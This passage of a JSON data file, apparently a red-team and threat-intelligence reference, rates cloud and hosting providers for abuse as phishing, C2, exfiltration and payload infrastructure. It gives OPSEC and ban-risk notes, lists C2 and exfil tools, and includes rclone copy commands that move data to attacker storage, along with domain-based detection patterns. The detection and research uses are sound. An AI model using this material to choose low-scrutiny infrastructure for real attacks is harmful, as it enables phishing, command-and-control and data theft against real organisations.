data.json

[
  {
    "name": "AWS (S3/Lambda/SES)",
    "url": "https://aws.amazon.com",
    "category": "Cloud",
    "provider": "Amazon",
    "signup": "email+cc",
    "signupTime": "~5min",
    "domains": [
      "*.s3.amazonaws.com",
      "*.cloudfront.net",
      "*.amazonaws.com",
      "*.on.aws"
    ],
    "trustedDomain": true,
    "domainFronting": true,
    "domainFrontingNotes": "CloudFront as C2 redirector via Lambda@Edge. Classic DF blocked 2018 but redirector technique same effect",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "s3.amazonaws.com/*",
      "lambda.*.amazonaws.com/*",
      "email.*.amazonaws.com/*"
    ],
    "opsec": "medium",
    "opsecNotes": "CloudTrail logging on by default. SES sandbox requires verified emails. Lambda logs to CloudWatch",
    "socDetection": "moderate",
    "banRisk": "low",
    "banNotes": "C2 hosting requires prior approval form. No auto-ban for normal usage",
    "verification": "CC required. Phone verification for some services. Identity verification for SES production",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": 365,
      "limits": "S3 5GB \u00b7 Lambda 1M req/mo \u00b7 SES 62k emails/mo (sandbox) \u00b7 EC2 750h t2.micro \u00b7 12 months"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "IAM SAML federation \u00b7 Cognito OIDC \u00b7 SSO Identity Center \u00b7 STS AssumeRoleWithSAML"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "aws-cli",
        "url": "https://lolexfil.github.io/#tool=aws%20cli",
        "note": ""
      },
      {
        "name": "s5cmd",
        "url": "https://lolexfil.github.io/#tool=s5cmd",
        "note": ""
      },
      {
        "name": "Arq Backup",
        "url": "https://lolexfil.github.io/#tool=Arq%20Backup",
        "note": ""
      },
      {
        "name": "CloudBerry/MSP360",
        "url": "https://lolexfil.github.io/#tool=CloudBerry%20/%20MSP360%20Backup",
        "note": ""
      },
      {
        "name": "duplicacy",
        "url": "https://lolexfil.github.io/#tool=duplicacy",
        "note": ""
      },
      {
        "name": "duplicati",
        "url": "https://lolexfil.github.io/#tool=duplicati",
        "note": ""
      },
      {
        "name": "duplicity",
        "url": "https://lolexfil.github.io/#tool=duplicity",
        "note": ""
      },
      {
        "name": "kopia",
        "url": "https://lolexfil.github.io/#tool=kopia",
        "note": ""
      },
      {
        "name": "restic",
        "url": "https://lolexfil.github.io/#tool=restic",
        "note": ""
      },
      {
        "name": "rclone",
        "url": "https://lolexfil.github.io/#tool=rclone",
        "note": ""
      },
      {
        "name": "Syncovery",
        "url": "https://lolexfil.github.io/#tool=Syncovery",
        "note": ""
      },
      {
        "name": "Synology Active Backup",
        "url": "https://lolexfil.github.io/#tool=Synology%20Active%20Backup",
        "note": ""
      },
      {
        "name": "Veeam Agent",
        "url": "https://lolexfil.github.io/#tool=Veeam%20Agent",
        "note": ""
      },
      {
        "name": "GoodSync",
        "url": "https://lolexfil.github.io/#tool=GoodSync",
        "note": ""
      },
      {
        "name": "Cyberduck",
        "url": "https://lolexfil.github.io/#tool=Cyberduck",
        "note": ""
      },
      {
        "name": "WinZip",
        "url": "https://lolexfil.github.io/#tool=WinZip",
        "note": ""
      }
    ],
    "mitre": [
      "T1583.006",
      "T1102",
      "T1567.002",
      "T1071.001"
    ],
    "refs": [
      {
        "title": "AWS Free Tier",
        "url": "https://aws.amazon.com/free/"
      },
      {
        "title": "AWS IAM SAML",
        "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers_saml.html"
      },
      {
        "title": "lolexfil",
        "url": "https://lolexfil.github.io"
      },
      {
        "title": "Mattysploit: C2 Redirector Usage - AWS Lambda & CloudFront",
        "url": "https://medium.com/@mattysploit/c2-redirector-usage-and-you-57364cfde409"
      },
      {
        "title": "Expel: Evilginx-ing into the Cloud - Detecting Red Team Attack in AWS",
        "url": "https://expel.com/blog/evilginx-into-cloud-detected-red-team-attack-in-aws/"
      },
      {
        "title": "Argv.Cloud: Red Team Phishing Infrastructure + Payload Setup on AWS",
        "url": "https://argv.cloud/blog/2025/red-team-infrastructure-setup/"
      }
    ],
    "detection": [
      "*.s3.amazonaws.com",
      "*.s3.*.amazonaws.com",
      "*.execute-api.*.amazonaws.com",
      "*.lambda-url.*.on.aws",
      "*.cloudfront.net",
      "email-smtp.*.amazonaws.com",
      "ses.*.amazonaws.com",
      "s3.amazonaws.com/*/",
      "CloudTrail: GetObject|PutObject|ListBucket spikes",
      "CloudTrail: sts:AssumeRole from unusual sources",
      "GuardDuty: Exfiltration:S3/* findings",
      "GuardDuty: UnauthorizedAccess:IAMUser/* findings",
      "VPC Flow Logs: large outbound transfers to S3 endpoints",
      "DNS: high-entropy subdomains (DNS exfil via Route53)"
    ],
    "notes": "Lambda@Edge + CloudFront as C2 redirector (replaces classic domain fronting blocked 2018). Full red team infra on AWS: Mythic C2 + CloudFront + ALB + Nginx redirector (Argv.Cloud). C2 hosting requires prior approval form (Simulated Events). Blob storage on S3 for payload hosting - not scanned on upload. SES for phishing at scale (sandbox: verified recipients only). 12-month free tier covers most red team needs",
    "customDomain": true,
    "customDomainNotes": "Route53 + CloudFront custom domains free with account",
    "dataRetention": "Permanent (S3)",
    "rateLimits": "Varies per service. S3 5500 GET/s per prefix. Lambda 1000 concurrent",
    "maxFileSize": "5TB per object (S3)",
    "logging": "CloudTrail logs all API calls. GuardDuty anomaly detection. VPC Flow Logs",
    "lolc2Url": "https://lolc2.github.io/#aws-x-ray"
  },
  {
    "name": "Azure (Functions/Blob/CDN)",
    "url": "https://azure.microsoft.com",
    "category": "Cloud",
    "provider": "Microsoft",
    "signup": "email+cc",
    "signupTime": "~5min",
    "domains": [
      "*.azurewebsites.net",
      "*.blob.core.windows.net",
      "*.web.core.windows.net",
      "*.azureedge.net",
      "*.cloudapp.azure.com",
      "*.azurestaticapps.net",
      "*.azurefd.net",
      "*.msappproxy.net"
    ],
    "trustedDomain": true,
    "domainFronting": true,
    "domainFrontingNotes": "Classic DF blocked Jan 2024. Azure FrontDoor/CDN redirectors still work via azurefd.net subdomains. Azure Functions as reverse proxy",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "management.azure.com/*",
      "graph.microsoft.com/*",
      "*.blob.core.windows.net/*"
    ],
    "opsec": "medium",
    "opsecNotes": "Azure Monitor/Sentinel may be watching. Functions have invocation logs. Blob access logs optional",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Pentest allowed without approval on own resources. Abuse reports forwarded to account owner",
    "verification": "CC required. Identity verification for some services",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": 30,
      "limits": "$200 credit 30 days \u00b7 Functions 1M exec/mo \u00b7 Blob 5GB LRS \u00b7 App Service F1 free \u00b7 Static Web Apps free"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Entra ID full SAML/OIDC/SCIM \u00b7 Graph API OAuth \u00b7 Conditional Access \u00b7 PRT-based SSO"
    },
    "knownC2": [
      {
        "name": "FunctionalC2",
        "url": "https://github.com/RedSiege/FunctionalC2"
      },
      {
        "name": "AzureFunctionRedirector",
        "url": "https://github.com/dmcxblue/AzureFunctionRedirector"
      },
      {
        "name": "AzureC2Relay",
        "url": "https://github.com/Flangvik/AzureC2Relay"
      },
      {
        "name": "AppProxyC2",
        "url": "https://github.com/xpn/AppProxyC2"
      },
      {
        "name": "ProxyBlob",
        "url": "https://github.com/Quarkslab/ProxyBlob"
      }
    ],
    "exfilTools": [
      {
        "name": "az-cli",
        "url": "https://lolexfil.github.io/#tool=az%20cli",
        "note": ""
      },
      {
        "name": "AzCopy",
        "url": "https://lolexfil.github.io/#tool=AzCopy",
        "note": ""
      },
      {
        "name": "Azure Storage Explorer",
        "url": "https://lolexfil.github.io/#tool=Azure%20Storage%20Explorer",
        "note": ""
      },
      {
        "name": "Azure Blob Storage",
        "url": "https://lolexfil.github.io/#tool=Azure%20Blob%20Storage",
        "note": ""
      },
      {
        "name": "CloudBerry/MSP360",
        "url": "https://lolexfil.github.io/#tool=CloudBerry%20/%20MSP360%20Backup",
        "note": ""
      },
      {
        "name": "duplicacy",
        "url": "https://lolexfil.github.io/#tool=duplicacy",
        "note": ""
      },
      {
        "name": "duplicati",
        "url": "https://lolexfil.github.io/#tool=duplicati",
        "note": ""
      },
      {
        "name": "duplicity",
        "url": "https://lolexfil.github.io/#tool=duplicity",
        "note": ""
      },
      {
        "name": "kopia",
        "url": "https://lolexfil.github.io/#tool=kopia",
        "note": ""
      },
      {
        "name": "restic",
        "url": "https://lolexfil.github.io/#tool=restic",
        "note": ""
      },
      {
        "name": "rclone",
        "url": "https://lolexfil.github.io/#tool=rclone",
        "note": ""
      },
      {
        "name": "Syncovery",
        "url": "https://lolexfil.github.io/#tool=Syncovery",
        "note": ""
      },
      {
        "name": "Cyberduck",
        "url": "https://lolexfil.github.io/#tool=Cyberduck",
        "note": ""
      },
      {
        "name": "Veeam Agent",
        "url": "https://lolexfil.github.io/#tool=Veeam%20Agent",
        "note": ""
      }
    ],
    "mitre": [
      "T1583.006",
      "T1102",
      "T1567.002",
      "T1071.001",
      "T1584.006"
    ],
    "refs": [
      {
        "title": "Azure Free Services",
        "url": "https://azure.microsoft.com/en-us/pricing/free-services/"
      },
      {
        "title": "Entra ID SSO",
        "url": "https://learn.microsoft.com/en-us/entra/identity/enterprise-apps/what-is-single-sign-on"
      },
      {
        "title": "lolc2 - Azure Functions",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "lolc2 - Azure Blob Storage",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "lolc2 - Azure App Proxy",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "lolexfil",
        "url": "https://lolexfil.github.io"
      },
      {
        "title": "DarkVortex: A Thousand Sails - C2 Infra on Azure (FrontDoor, CDN, Functions)",
        "url": "https://0xdarkvortex.dev/c2-infra-on-azure/"
      },
      {
        "title": "NetSPI: Utilizing Azure Services for Red Team Engagements",
        "url": "https://www.netspi.com/blog/technical-blog/cloud-pentesting/utiilzing-azure-for-red-team-engagements/"
      },
      {
        "title": "Mattysploit: C2 Redirector Usage - Azure FrontDoor, Cloudflare Workers, AWS Lambda",
        "url": "https://medium.com/@mattysploit/c2-redirector-usage-and-you-57364cfde409"
      }
    ],
    "detection": [
      "*.azurewebsites.net/api/*",
      "*.blob.core.windows.net/*",
      "*.msappproxy.net/*"
    ],
    "notes": "'Everything in Azure is a C2 service' (DarkVortex). FrontDoor as C2 redirector with azurefd.net subdomains (classic domain fronting blocked Jan 2024 but redirector technique works). Edgio CDN retired Jan 2025 - operators shifted to Azure FrontDoor + Cloudflare Workers. Functions as reverse proxy for C2. Blob Storage for payload hosting on *.blob.core.windows.net. Static Web Apps for phishing. App Service for C2 endpoints. $200 free credit for 30 days",
    "customDomain": true,
    "customDomainNotes": "Custom domains on App Service, Functions, CDN, FrontDoor",
    "dataRetention": "Permanent (Blob)",
    "rateLimits": "Functions: 100 concurrent. Blob: 20k req/s per account",
    "maxFileSize": "4.75TB block blob",
    "logging": "Activity Log, Diagnostic Logs, Sentinel, Defender for Cloud",
    "lolc2Url": "https://lolc2.github.io/#microsoft-azure-functions"
  },
  {
    "name": "Google Cloud (GCF/GCS/Firebase)",
    "url": "https://cloud.google.com",
    "category": "Cloud",
    "provider": "Google",
    "signup": "email+cc",
    "signupTime": "~5min",
    "domains": [
      "*.appspot.com",
      "*.web.app",
      "*.firebaseapp.com",
      "firebasestorage.googleapis.com",
      "storage.googleapis.com",
      "*.cloudfunctions.net",
      "*.run.app"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "GCP blocked domain fronting 2018. Cloud Functions can redirect but not classic DF",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "storage.googleapis.com/*",
      "cloudfunctions.net/*",
      "firebasestorage.googleapis.com/*"
    ],
    "opsec": "medium",
    "opsecNotes": "Cloud Audit Logs on by default. Firebase hosting gives clean *.web.app domain. Cloud Run auto-scales",
    "socDetection": "moderate",
    "banRisk": "low",
    "banNotes": "Pentest allowed on own projects without notification. Abuse team active but slow",
    "verification": "CC required. Phone verification. Identity for billing",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": 90,
      "limits": "$300 credit 90d \u00b7 Functions 2M invoc/mo \u00b7 GCS 5GB \u00b7 Cloud Run 2M req/mo \u00b7 Firebase free Spark plan"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Workspace SAML/OIDC federation \u00b7 OAuth consent phishing \u00b7 Service account key theft"
    },
    "knownC2": [
      {
        "name": "GC2-Sheet",
        "url": "https://github.com/looCiprian/GC2-sheet"
      },
      {
        "name": "Google RAT",
        "url": "https://github.com/a-rey/google_RAT"
      },
      {
        "name": "firec2 (Firebase)",
        "url": "https://github.com/s0ld13rr/firec2"
      }
    ],
    "exfilTools": [
      {
        "name": "gsutil",
        "url": "https://lolexfil.github.io/#tool=gsutil",
        "note": ""
      },
      {
        "name": "CloudBerry/MSP360",
        "url": "https://lolexfil.github.io/#tool=CloudBerry%20/%20MSP360%20Backup",
        "note": ""
      },
      {
        "name": "duplicacy",
        "url": "https://lolexfil.github.io/#tool=duplicacy",
        "note": ""
      },
      {
        "name": "duplicati",
        "url": "https://lolexfil.github.io/#tool=duplicati",
        "note": ""
      },
      {
        "name": "duplicity",
        "url": "https://lolexfil.github.io/#tool=duplicity",
        "note": ""
      },
      {
        "name": "kopia",
        "url": "https://lolexfil.github.io/#tool=kopia",
        "note": ""
      },
      {
        "name": "restic",
        "url": "https://lolexfil.github.io/#tool=restic",
        "note": ""
      },
      {
        "name": "rclone",
        "url": "https://lolexfil.github.io/#tool=rclone",
        "note": ""
      }
    ],
    "mitre": [
      "T1583.006",
      "T1102",
      "T1567.002",
      "T1566.002"
    ],
    "refs": [
      {
        "title": "GCP Free Tier",
        "url": "https://cloud.google.com/free"
      },
      {
        "title": "Workspace SAML SSO",
        "url": "https://support.google.com/a/answer/6087519"
      },
      {
        "title": "lolc2 - Firebase",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "lolc2 - Google Sheets",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "firebasestorage.googleapis.com/*",
      "sheets.googleapis.com/*"
    ],
    "notes": "Firebase C2 (firec2), Google Sheets/Drive C2 (GC2-Sheet used by APT41/Voldemort). Firebase hosting gives instant *.web.app sites. Cloud Functions for serverless C2 logic",
    "customDomain": true,
    "customDomainNotes": "Custom domains on Cloud Run, App Engine, Firebase Hosting",
    "dataRetention": "Permanent (GCS)",
    "rateLimits": "Cloud Functions: 1000 concurrent. GCS: 5000 read/s per bucket",
    "maxFileSize": "5TB per object (GCS)",
    "logging": "Cloud Audit Logs, Cloud Logging. All API calls logged",
    "lolc2Url": "https://lolc2.github.io/#firebase"
  },
  {
    "name": "Oracle Cloud",
    "url": "https://cloud.oracle.com",
    "category": "Cloud",
    "provider": "Oracle",
    "signup": "email+cc",
    "signupTime": "~10min",
    "domains": [
      "*.oraclecloud.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Minimal monitoring compared to AWS/Azure. Always Free VMs never expire. Less SOC visibility",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Minimal abuse enforcement. Always Free VMs rarely reviewed",
    "verification": "CC required. Identity verification at signup",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Always Free forever: 2 AMD VMs \u00b7 200GB block \u00b7 10TB egress/mo \u00b7 2 autonomous DBs \u00b7 ARM Ampere 4 OCPUs"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "OCI IAM SAML/OIDC federation \u00b7 Identity domains with SCIM"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1583.003",
      "T1102"
    ],
    "refs": [
      {
        "title": "Oracle Always Free",
        "url": "https://www.oracle.com/cloud/free/"
      },
      {
        "title": "OCI IAM Docs",
        "url": "https://docs.oracle.com/en-us/iaas/Content/Identity/home.htm"
      }
    ],
    "detection": [
      "*.oraclecloud.com",
      "*.ocp.oraclecloud.com",
      "objectstorage.*.oraclecloud.com",
      "*.oci.oraclecloud.com",
      "*.functions.oci.oraclecloud.com",
      "*.apigateway.*.oci.customer-oci.com",
      "cloud.oracle.com",
      "idcs-*.identity.oraclecloud.com"
    ],
    "notes": "Best always-free tier for persistent red team infra. 2 VMs + 4 ARM cores that never expire. Far less scrutinized than AWS/Azure by SOCs and threat intel feeds",
    "customDomain": true,
    "customDomainNotes": "Custom domains on OCI services",
    "dataRetention": "Permanent",
    "rateLimits": "Varies per service",
    "maxFileSize": "10GB Object Storage objects",
    "logging": "Audit service logs all API calls"
  },
  {
    "name": "DigitalOcean",
    "url": "https://digitalocean.com",
    "category": "Cloud",
    "provider": "DigitalOcean",
    "signup": "email+cc",
    "signupTime": "~5min",
    "domains": [
      "*.ondigitalocean.app",
      "*.digitaloceanspaces.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Less monitoring than hyperscalers. Spaces is S3-compatible",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Abuse reports handled manually. Less aggressive than hyperscalers",
    "verification": "CC required. Email verification",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "trial",
      "devAccount": true,
      "trialDays": 60,
      "limits": "$200 credit 60 days \u00b7 Spaces 250GB \u00b7 Droplets from $4/mo"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "OAuth for API only \u00b7 No enterprise SSO"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "rclone",
        "url": "https://github.com/rclone/rclone",
        "note": "rclone copy /data spaces:bucket/ (S3-compatible)"
      }
    ],
    "mitre": [
      "T1583.003",
      "T1583.006"
    ],
    "refs": [
      {
        "title": "DO Pricing",
        "url": "https://www.digitalocean.com/pricing"
      },
      {
        "title": "lolexfil",
        "url": "https://lolexfil.github.io"
      }
    ],
    "detection": [
      "*.ondigitalocean.app",
      "*.digitaloceanspaces.com",
      "*.sfo2.digitaloceanspaces.com",
      "*.nyc3.digitaloceanspaces.com",
      "*.ams3.digitaloceanspaces.com",
      "api.digitalocean.com",
      "cloud.digitalocean.com",
      "*.do.co",
      "registry.digitalocean.com"
    ],
    "notes": "S3-compatible Spaces for exfil staging, droplets for C2 infra. $200 credit = 2 months of free infrastructure. Less monitored than hyperscalers",
    "customDomain": true,
    "customDomainNotes": "Custom domains on Droplets, App Platform",
    "dataRetention": "Permanent (Spaces)",
    "rateLimits": "Spaces: 750 req/s",
    "maxFileSize": "5GB per object (Spaces)",
    "logging": "Monitoring dashboard. No detailed API audit logs on free"
  },
  {
    "name": "Cloudflare (Workers/Pages/R2/Tunnels)",
    "url": "https://cloudflare.com",
    "category": "Cloud",
    "provider": "Cloudflare",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "*.workers.dev",
      "*.pages.dev",
      "*.trycloudflare.com",
      "*.cfargotunnel.com"
    ],
    "trustedDomain": true,
    "domainFronting": true,
    "domainFrontingNotes": "Workers as reverse proxy redirectors. trycloudflare.com tunnels need NO account. Pages custom domains free. R2 presigned URLs",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 1
    },
    "apiEndpoints": [
      "api.cloudflare.com/*",
      "cloudflare-dns.com/dns-query"
    ],
    "opsec": "low",
    "opsecNotes": "Workers as reverse proxy - MitM position on all traffic. Steal auth headers, cookies, inject JS. trycloudflare.com tunnels need no account at all. DoH via cloudflare-dns.com. Pages for phishing. R2 for payload hosting. Default workers.dev domain should be avoided for OPSEC - use custom domain",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Workers/Pages rarely flagged. Tunnels are ephemeral. R2 has no content scanning",
    "verification": "Email only. No CC for free tier. No phone verification",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Workers 100k req/day \u00b7 Pages unlimited \u00b7 R2 10GB/mo \u00b7 Tunnels free \u00b7 Zero Trust 50 users free"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Zero Trust Access with SAML/OIDC \u00b7 SCIM on Enterprise \u00b7 Workers have no auth by default"
    },
    "knownC2": [
      {
        "name": "CloudflarePagesRedirector",
        "url": "https://github.com/ChoiSG/CloudflarePagesRedirector"
      },
      {
        "name": "Cloudflare-Redirector",
        "url": "https://github.com/som3canadian/Cloudflare-Redirector"
      },
      {
        "name": "SkyFall-Pack",
        "url": "https://github.com/nickvourd/SkyFall-Pack"
      }
    ],
    "exfilTools": [
      {
        "name": "rclone",
        "url": "https://github.com/rclone/rclone",
        "note": "R2 is S3-compatible: rclone copy /data r2:bucket/"
      }
    ],
    "mitre": [
      "T1090.004",
      "T1102",
      "T1583.006",
      "T1071.001"
    ],
    "refs": [
      {
        "title": "CF Workers Pricing",
        "url": "https://developers.cloudflare.com/workers/platform/pricing/"
      },
      {
        "title": "CF R2 Pricing",
        "url": "https://developers.cloudflare.com/r2/pricing/"
      },
      {
        "title": "lolc2 - Cloudflare",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "Abusing Cloudflare Workers (christophetd)",
        "url": "https://blog.christophetd.fr/abusing-cloudflare-workers/"
      },
      {
        "title": "Securing C2 for Red Team Operations Using Cloudflare Workers + Zero Trust Tunnels",
        "url": "https://cgomezsec.com/blog/securing-c2-for-rt-operations-using-cloudflare"
      },
      {
        "title": "Sekoia: Threat Actors Abuse Cloudflare Tunnels to Distribute RATs",
        "url": "https://cyberpress.org/threat-actors-abuse-cloudflare-tunnels/"
      },
      {
        "title": "Hunt.io: Russian Actor Abuses Cloudflare & Telegram in Phishing",
        "url": "https://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2"
      },
      {
        "title": "SC Media: Abuse of Cloudflare Domains for Phishing Doubled in 2024",
        "url": "https://www.scworld.com/news/abuse-of-cloudflare-domains-for-phishing-doubled-in-2024-report-says"
      },
      {
        "title": "I Need a C2 Infrastructure Immediately - Cloudflare Workers as Redirectors (nickvourd)",
        "url": "https://medium.com/@nickvourd/i-need-a-c2-infrastructure-immediately-as-in-yesterday-23bc5bd76fbe"
      }
    ],
    "detection": [
      "*.workers.dev",
      "*.pages.dev",
      "*.cfargotunnel.com",
      "cloudflare-dns.com/dns-query"
    ],
    "notes": "Workers as C2 redirectors (replaced Edgio CDN retired Jan 2025). Workers MitM: steal auth headers, cookies, inject malicious JS into responses (christophetd). trycloudflare.com tunnels need NO account. Workers + Zero Trust Tunnels for Sliver C2 (cgomezsec). Pages phishing doubled in 2024 (SC Media). Russian actors use Cloudflare phishing lures + Telegram C2 (Hunt.io). Abuse of Cloudflare domains for phishing 2x increase 2024",
    "customDomain": true,
    "customDomainNotes": "Free custom domains on Pages, Workers routes, Tunnels",
    "dataRetention": "Permanent (R2, Pages)",
    "rateLimits": "Workers: 100k req/day free. R2: 1M class A ops/mo free",
    "maxFileSize": "5GB per object (R2). 25MB Worker script",
    "logging": "Workers analytics. No detailed request logging on free tier",
    "lolc2Url": "https://lolc2.github.io/#cloudflare"
  },
  {
    "name": "Heroku",
    "url": "https://heroku.com",
    "category": "Cloud",
    "provider": "Salesforce",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "*.herokuapp.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Salesforce-owned = highly trusted domain. Deploy from Git in seconds",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "Salesforce abuse team moderately active. Phishing pages get reported",
    "verification": "Email only. CC for paid dynos",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "none",
      "devAccount": false,
      "trialDays": null,
      "limits": "Eco dynos $5/mo (free tier removed Nov 2022) \u00b7 Deploy from Git \u00b7 Custom domains on paid"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "SAML on Enterprise \u00b7 Heroku OAuth for API"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1583.006",
      "T1102"
    ],
    "refs": [
      {
        "title": "Heroku Pricing",
        "url": "https://www.heroku.com/pricing"
      }
    ],
    "detection": [
      "*.herokuapp.com",
      "*.herokucdn.com",
      "*.herokudns.com",
      "api.heroku.com",
      "*.herokuapp.com/api/*",
      "addons-sso.heroku.com",
      "dashboard.heroku.com",
      "CNAME dangling: 'No such app' response from herokuapp.com"
    ],
    "notes": "Salesforce-owned trusted domain. No longer free but still quick to deploy. *.herokuapp.com trusted by most proxy/email filters",
    "customDomain": true,
    "customDomainNotes": "Custom domains on paid dynos only ($5/mo minimum)",
    "dataRetention": "Ephemeral filesystem. Postgres persistent",
    "rateLimits": "2400 req/app/hr (free)",
    "maxFileSize": "500MB slug size",
    "logging": "Logplex aggregated logs. Heroku Runtime metrics"
  },
  {
    "name": "Vercel",
    "url": "https://vercel.com",
    "category": "Cloud",
    "provider": "Vercel",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "*.vercel.app"
    ],
    "trustedDomain": false,
    "domainFronting": true,
    "domainFrontingNotes": "Edge Functions can redirect/rewrite. vercel.app trusted domain acts as redirector via middleware",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Instant deploy from Git. Serverless functions for redirectors. Custom domains free",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Minimal abuse enforcement. Phishing pages may persist for days",
    "verification": "Email or GitHub OAuth. No CC for free tier",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "100GB bandwidth \u00b7 Serverless 100GB-hrs \u00b7 Unlimited deploys \u00b7 Custom domains free"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Enterprise \u00b7 OAuth for Git providers"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1583.006",
      "T1566.002"
    ],
    "refs": [
      {
        "title": "Vercel Pricing",
        "url": "https://vercel.com/pricing"
      },
      {
        "title": "Vercel SAML",
        "url": "https://vercel.com/docs/security/single-sign-on"
      }
    ],
    "detection": [
      "*.vercel.app",
      "*.now.sh",
      "*.vercel.sh",
      "api.vercel.com",
      "vercel.com/api/*",
      "*.vercel-dns.com",
      "edge-config.vercel.com",
      "vitals.vercel-insights.com",
      "va.vercel-scripts.com"
    ],
    "notes": "Instant deploy from Git push. Serverless functions for payload redirectors. Custom domains free. Clean *.vercel.app URLs",
    "customDomain": true,
    "customDomainNotes": "Free custom domains on all plans",
    "dataRetention": "Permanent (deployments immutable)",
    "rateLimits": "Serverless: 100GB-hrs/mo. Edge: unlimited invocations",
    "maxFileSize": "50MB per file in deployment",
    "logging": "Analytics on Pro. No detailed logs on free"
  },
  {
    "name": "Netlify",
    "url": "https://netlify.com",
    "category": "Cloud",
    "provider": "Netlify",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "*.netlify.app"
    ],
    "trustedDomain": false,
    "domainFronting": true,
    "domainFrontingNotes": "Redirect rules via _redirects file or netlify.toml. netlify.app trusted domain",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Quick static hosting with functions. Deploy from Git",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Minimal abuse enforcement",
    "verification": "Email or Git OAuth. No CC for free tier",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "100GB bandwidth \u00b7 125k function invocations/mo \u00b7 Custom domains free"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "SAML on Enterprise \u00b7 OAuth for Git providers"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1583.006",
      "T1566.002"
    ],
    "refs": [
      {
        "title": "Netlify Pricing",
        "url": "https://www.netlify.com/pricing/"
      }
    ],
    "detection": [
      "*.netlify.app",
      "*.netlify.com",
      "*.netlify.live",
      "api.netlify.com",
      "app.netlify.com",
      "functions.netlify.com",
      "*.netlifyglobalcdn.com",
